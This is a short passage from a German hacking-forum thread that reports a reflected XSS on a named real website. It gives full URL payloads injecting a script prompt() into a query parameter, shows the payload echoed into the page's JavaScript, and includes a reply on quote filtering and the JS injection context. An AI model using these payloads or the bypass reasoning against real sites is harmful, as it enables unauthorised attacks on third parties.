http://www.cantwo.de/einzelbilder.php?kategorie=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28byxoil%29%3C%2fScRiPt%3E
lg
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
<script> $(document).ready(function(){ //Examples of how to assign the ColorBox event to elements $(".group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>").colorbox({rel:'group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>', transition:"none", width:"90%"}); $(".group2").colorbox({rel:'group2', transition:"fade"}); $(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"}); $(".group4").colorbox({rel:'group4', slideshow:true}); $(".callbacks").colorbox({ onOpen:function(){ alert('onOpen: colorbox is about to open'); }, onload:function(){ alert('onload: colorbox has started to load the targeted content'); }, onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); }, onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); }, onClosed:function(){ alert('onClosed: colorbox has completely closed'); } }); //Example of preserving a Javascript event for inline calls. $("#click").click(function(){ $('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here."); return false; }); }); </script>
Liegt daran, dass Text in der Klammer steht (zahlen würden gehn) und sowohl ' wie auch " gefilert und durch /' bzw /" ersetzt werdenIch kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
http://www.cantwo.de/einzelbilder.php?kategorie=<script>prompt(/byxoil/)</script>
Bearbeitet von Laggy, 23 October 2013 - 17:28 Uhr.
Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
---|---|---|---|---|---|
[xss] lablue.de |
Classic Hacking |
|
|
|
|
CVE-2013-6837 - DOM Based XSSDOM XSS, XSS, pentest |
Classic Hacking | vestas88 |
|
|
|
[XSS] de.filesovermiles.com |
Classic Hacking | SecurityFlaw |
|
|